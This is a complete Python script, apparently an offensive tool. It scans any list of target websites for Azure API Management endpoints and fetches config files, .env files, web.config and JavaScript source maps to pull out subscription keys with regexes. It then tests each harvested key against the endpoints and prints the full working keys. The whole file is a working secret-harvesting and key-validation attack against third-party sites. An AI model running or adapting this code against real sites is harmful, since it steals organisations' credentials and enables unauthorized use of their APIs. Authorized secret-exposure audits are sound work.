#!/usr/bin/env python3
"""
APIM Discovery Scanner - Find websites using Azure APIM and check for exposed keys
Targets: JavaScript bundles, config files, source maps, etc.
"""

import re
import sys
import json
import argparse
import concurrent.futures
from typing import List, Dict, Set, Optional
from urllib.parse import urljoin, urlparse
import hashlib

try:
    import requests
    from requests.adapters import HTTPAdapter
    from urllib3.util.retry import Retry
    from bs4 import BeautifulSoup
except ImportError:
    print("Error: Required libraries. Install with:")
    print("  pip install requests beautifulsoup4")
    sys.exit(1)


class APIMDiscoveryScanner:
    """Discover and scan sites using Azure APIM"""
    
    # APIM URL patterns
    APIM_PATTERNS = [
        r'https?://[a-zA-Z0-9\-]+\.azure-api\.net[/\w\-\._~:/?#\[\]@!$&\'()*+,;=]*',
    ]
    
    # APIM key patterns
    KEY_PATTERNS = [
        # GUID format (most common for APIM)
        r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
        # Hex keys (32 chars)
        r'\b[0-9a-f]{32}\b',
        # Alphanumeric keys (32-64 chars)
        r'\b[a-zA-Z0-9]{32,64}\b',
    ]
    
    # Header patterns in code
    HEADER_PATTERNS = [
        r'["\']Ocp-Apim-Subscription-Key["\'][\s:,]+["\']([^"\']+)["\']',
        r'subscription[-_]?key["\']?[\s:=]+["\']([^"\']+)["\']',
        r'api[-_]?key["\']?[\s:=]+["\']([^"\']+)["\']',
    ]
    
    # Files to scan for keys
    TARGET_FILES = [
        # Config files
        'config.js', 'config.json', 'configuration.js', 'constants.js',
        'settings.js', 'settings.json', 'appsettings.json',
        'environment.js', 'env.js', 'app-config.js', 'api-config.js',
        # Build artifacts
        'main.js', 'app.js', 'bundle.js', 'vendor.js', 'runtime.js',
        'main.*.js', 'app.*.js', 'chunk.*.js',
        # Source maps (goldmine for keys)
        'main.js.map', 'app.js.map', 'bundle.js.map',
        # Other
        '.env', 'web.config', 'appsettings.Development.json',
    ]
    
    # Common paths where files are hosted
    COMMON_PATHS = [
        '/', '/js/', '/static/', '/assets/', '/dist/', '/build/',
        '/scripts/', '/config/', '/_next/static/', '/static/js/',
    ]
    
    def __init__(self, timeout=10, threads=10, verbose=False, user_agent=None):
        self.timeout = timeout
        self.threads = threads
        self.verbose = verbose
        self.session = self._create_session(user_agent)
        self.findings = {
            'apim_urls': set(),
            'potential_keys': set(),
            'exposed_files': [],
            'working_keys': []
        }
        
    def _create_session(self, user_agent=None):
        """Create requests session"""
        session = requests.Session()
        retry = Retry(total=2, backoff_factor=0.5, status_forcelist=[500, 502, 503, 504])
        adapter = HTTPAdapter(max_retries=retry)
        session.mount('http://', adapter)
        session.mount('https://', adapter)
        
        # Realistic user agent
        if not user_agent:
            user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        session.headers.update({'User-Agent': user_agent})
        
        return session
    
    def log(self, message, level="INFO"):
        if self.verbose:
            color_codes = {
                "INFO": "\033[94m",
                "SUCCESS": "\033[92m",
                "WARN": "\033[93m",
                "ERROR": "\033[91m",
                "END": "\033[0m"
            }
            color = color_codes.get(level, "")
            end = color_codes["END"]
            print(f"{color}[{level}]{end} {message}")
    
    def detect_apim_usage(self, url: str) -> Dict:
        """Check if a website uses Azure APIM"""
        result = {
            'url': url,
            'uses_apim': False,
            'apim_endpoints': [],
            'confidence': 'none'
        }
        
        try:
            self.log(f"Checking: {url}")
            response = self.session.get(url, timeout=self.timeout, allow_redirects=True)
            
            if response.status_code != 200:
                return result
            
            content = response.text
            
            # Look for APIM URLs in the HTML/JS
            apim_urls = self._extract_apim_urls(content)
            
            if apim_urls:
                result['uses_apim'] = True
                result['apim_endpoints'] = list(apim_urls)
                result['confidence'] = 'high'
                self.log(f"✓ APIM detected! Found {len(apim_urls)} endpoints", "SUCCESS")
                
                # Store globally
                self.findings['apim_urls'].update(apim_urls)
            
            # Also check for APIM-related keywords
            keywords = ['azure-api.net', 'ocp-apim', 'subscription-key', 'apim-']
            keyword_count = sum(content.lower().count(kw) for kw in keywords)
            
            if keyword_count > 0 and not result['uses_apim']:
                result['uses_apim'] = True
                result['confidence'] = 'medium'
                self.log(f"APIM keywords detected ({keyword_count} occurrences)", "WARN")
            
        except requests.exceptions.RequestException as e:
            self.log(f"Error checking {url}: {str(e)[:100]}", "ERROR")
        
        return result
    
    def _extract_apim_urls(self, content: str) -> Set[str]:
        """Extract APIM URLs from content"""
        urls = set()
        for pattern in self.APIM_PATTERNS:
            matches = re.findall(pattern, content, re.IGNORECASE)
            urls.update(matches)
        return urls
    
    def _extract_keys(self, content: str) -> Set[str]:
        """Extract potential API keys from content"""
        keys = set()
        
        # First try header patterns (more accurate)
        for pattern in self.HEADER_PATTERNS:
            matches = re.findall(pattern, content, re.IGNORECASE)
            keys.update(matches)
        
        # Then try general key patterns near APIM references
        lines = content.split('\n')
        for i, line in enumerate(lines):
            if 'apim' in line.lower() or 'subscription' in line.lower() or 'api-key' in line.lower():
                # Check surrounding lines (context window)
                context = '\n'.join(lines[max(0, i-3):min(len(lines), i+4)])
                for pattern in self.KEY_PATTERNS:
                    matches = re.findall(pattern, context)
                    keys.update([k for k in matches if self._is_valid_key(k)])
        
        return keys
    
    def _is_valid_key(self, key: str) -> bool:
        """Validate key to reduce false positives"""
        # Exclude common false positives
        false_positives = [
            'ffffffff', '00000000', '12345678', 'deadbeef',
            'aaaaaaaa', 'bbbbbbbb', 'cccccccc', 'dddddddd',
            '11111111', '99999999', 'abcdef12', '00000000-0000-0000-0000-000000000000',
            'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx'
        ]
        
        key_lower = key.lower()
        if key_lower in false_positives:
            return False
        
        # Check entropy (not all same characters)
        if len(set(key_lower)) < 8:
            return False
        
        # Check if it's a common placeholder
        if any(x in key_lower for x in ['example', 'sample', 'test', 'dummy', 'your-key', 'placeholder']):
            return False
        
        return True
    
    def scan_target_files(self, base_url: str) -> List[Dict]:
        """Scan common file locations for exposed keys"""
        results = []
        
        # Generate URLs to check
        urls_to_check = []
        for path in self.COMMON_PATHS:
            for filename in self.TARGET_FILES:
                if '*' in filename:
                    # Skip wildcards for now (would need directory listing)
                    continue
                url = urljoin(base_url, path + filename)
                urls_to_check.append(url)
        
        # Also check the root page for JS/CSS links
        try:
            response = self.session.get(base_url, timeout=self.timeout)
            soup = BeautifulSoup(response.text, 'html.parser')
            
            # Extract all script and link tags
            for tag in soup.find_all(['script', 'link']):
                src = tag.get('src') or tag.get('href')
                if src:
                    full_url = urljoin(base_url, src)
                    if full_url.endswith(('.js', '.json', '.map')):
                        urls_to_check.append(full_url)
        except:
            pass
        
        # Remove duplicates
        urls_to_check = list(set(urls_to_check))
        
        self.log(f"Checking {len(urls_to_check)} potential files...")
        
        # Check files in parallel
        with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:
            future_to_url = {executor.submit(self._check_file, url): url for url in urls_to_check}
            
            for future in concurrent.futures.as_completed(future_to_url):
                result = future.result()
                if result:
                    results.append(result)
        
        return results
    
    def _check_file(self, url: str) -> Optional[Dict]:
        """Check a single file for APIM keys"""
        try:
            response = self.session.get(url, timeout=self.timeout)
            
            if response.status_code == 200:
                content = response.text
                
                # Extract APIM URLs
                apim_urls = self._extract_apim_urls(content)
                
                # Extract keys
                keys = self._extract_keys(content)
                
                if apim_urls or keys:
                    self.log(f"✓ Found in {url}", "SUCCESS")
                    
                    result = {
                        'url': url,
                        'size': len(content),
                        'apim_endpoints': list(apim_urls),
                        'potential_keys': list(keys)
                    }
                    
                    # Store findings
                    self.findings['apim_urls'].update(apim_urls)
                    self.findings['potential_keys'].update(keys)
                    self.findings['exposed_files'].append(result)
                    
                    return result
        except:
            pass
        
        return None
    
    def test_key_on_endpoint(self, endpoint: str, key: str) -> Dict:
        """Test if a key works on an APIM endpoint"""
        result = {
            'endpoint': endpoint,
            'key': key[:8] + '...' + key[-4:],
            'key_full': key,
            'valid': False,
            'status_code': None,
            'error': None
        }
        
        headers_to_try = [
            'Ocp-Apim-Subscription-Key',
            'X-Api-Key',
            'ApiKey',
        ]
        
        # Try common endpoints
        test_paths = ['/', '/api/health', '/health', '/status', '/api/status']
        
        for header_name in headers_to_try:
            for test_path in test_paths:
                try:
                    test_url = urljoin(endpoint, test_path)
                    headers = {header_name: key}
                    
                    response = self.session.get(test_url, headers=headers, timeout=self.timeout)
                    result['status_code'] = response.status_code
                    
                    # Success codes
                    if response.status_code in [200, 201, 202, 204]:
                        result['valid'] = True
                        result['header_name'] = header_name
                        result['test_path'] = test_path
                        self.log(f"✓✓✓ KEY WORKS! {header_name} on {test_url}", "SUCCESS")
                        return result
                    
                    # Key valid but endpoint/method issue
                    elif response.status_code in [400, 404, 405, 429]:
                        result['valid'] = True
                        result['header_name'] = header_name
                        result['test_path'] = test_path
                        result['note'] = 'Key valid but endpoint issue'
                        self.log(f"✓ Key appears valid (HTTP {response.status_code})", "SUCCESS")
                        return result
                    
                except Exception as e:
                    result['error'] = str(e)
        
        return result
    
    def full_scan(self, target_url: str) -> Dict:
        """Complete scan of a target website"""
        self.log(f"\n{'='*80}\nFull Scan: {target_url}\n{'='*80}\n")
        
        # Step 1: Detect APIM usage
        detection = self.detect_apim_usage(target_url)
        
        # Step 2: Scan files for keys
        file_results = self.scan_target_files(target_url)
        
        # Step 3: Test any keys found
        if self.findings['potential_keys'] and self.findings['apim_urls']:
            self.log(f"\nTesting {len(self.findings['potential_keys'])} keys on {len(self.findings['apim_urls'])} endpoints...")
            
            for key in self.findings['potential_keys']:
                for endpoint in self.findings['apim_urls']:
                    test_result = self.test_key_on_endpoint(endpoint, key)
                    if test_result['valid']:
                        self.findings['working_keys'].append(test_result)
        
        return {
            'target': target_url,
            'uses_apim': detection['uses_apim'],
            'apim_endpoints': list(self.findings['apim_urls']),
            'exposed_files': self.findings['exposed_files'],
            'potential_keys_found': len(self.findings['potential_keys']),
            'working_keys': self.findings['working_keys']
        }
    
    def scan_multiple_targets(self, targets: List[str]) -> List[Dict]:
        """Scan multiple targets"""
        results = []
        
        for target in targets:
            try:
                result = self.full_scan(target)
                results.append(result)
            except Exception as e:
                self.log(f"Error scanning {target}: {e}", "ERROR")
        
        return results


def print_report(results: Dict):
    """Print scan results"""
    print("\n" + "="*80)
    print("APIM DISCOVERY SCANNER - RESULTS")
    print("="*80)
    
    print(f"\nTarget: {results['target']}")
    print(f"Uses APIM: {'YES' if results['uses_apim'] else 'NO'}")
    
    if results['apim_endpoints']:
        print(f"\n[APIM ENDPOINTS FOUND] ({len(results['apim_endpoints'])})")
        for endpoint in results['apim_endpoints']:
            print(f"  • {endpoint}")
    
    if results['exposed_files']:
        print(f"\n[EXPOSED FILES WITH KEYS] ({len(results['exposed_files'])})")
        for file_info in results['exposed_files']:
            print(f"\n  File: {file_info['url']}")
            print(f"  Size: {file_info['size']} bytes")
            if file_info['apim_endpoints']:
                print(f"  APIM URLs: {len(file_info['apim_endpoints'])}")
            if file_info['potential_keys']:
                print(f"  Keys Found: {len(file_info['potential_keys'])}")
                for key in file_info['potential_keys']:
                    print(f"    → {key[:8]}...{key[-4:]}")
    
    if results['working_keys']:
        print(f"\n[WORKING KEYS FOUND] ({len(results['working_keys'])})")
        for key_info in results['working_keys']:
            print(f"\n  ✓ ACTIVE KEY:")
            print(f"    Key: {key_info['key']}")
            print(f"    Full: {key_info['key_full']}")
            print(f"    Endpoint: {key_info['endpoint']}")
            print(f"    Header: {key_info.get('header_name', 'N/A')}")
            print(f"    Status: {key_info['status_code']}")
    
    if not results['uses_apim']:
        print("\n[!] No APIM usage detected on this target.")


def main():
    parser = argparse.ArgumentParser(
        description='APIM Discovery Scanner - Find sites using Azure APIM',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Scan a single website
  python apim_discovery_scanner.py -u https://example.com
  
  # Scan multiple sites from file
  python apim_discovery_scanner.py -f targets.txt
  
  # Verbose output
  python apim_discovery_scanner.py -u https://example.com -v
  
  # Save results
  python apim_discovery_scanner.py -u https://example.com -o results.json
        """
    )
    
    parser.add_argument('-u', '--url', help='Target website URL')
    parser.add_argument('-f', '--file', help='File with target URLs (one per line)')
    parser.add_argument('-o', '--output', help='Save results to JSON file')
    parser.add_argument('-t', '--timeout', type=int, default=10, help='Timeout (default: 10s)')
    parser.add_argument('--threads', type=int, default=10, help='Threads (default: 10)')
    parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
    
    args = parser.parse_args()
    
    if not args.url and not args.file:
        parser.print_help()
        sys.exit(1)
    
    scanner = APIMDiscoveryScanner(
        timeout=args.timeout,
        threads=args.threads,
        verbose=args.verbose
    )
    
    targets = []
    if args.url:
        targets.append(args.url)
    if args.file:
        with open(args.file, 'r') as f:
            targets.extend([line.strip() for line in f if line.strip()])
    
    # Scan targets
    if len(targets) == 1:
        result = scanner.full_scan(targets[0])
        print_report(result)
        
        if args.output:
            with open(args.output, 'w') as f:
                json.dump(result, f, indent=2, default=list)
    else:
        results = scanner.scan_multiple_targets(targets)
        for result in results:
            print_report(result)
        
        if args.output:
            with open(args.output, 'w') as f:
                json.dump(results, f, indent=2, default=list)


if __name__ == '__main__':
    main()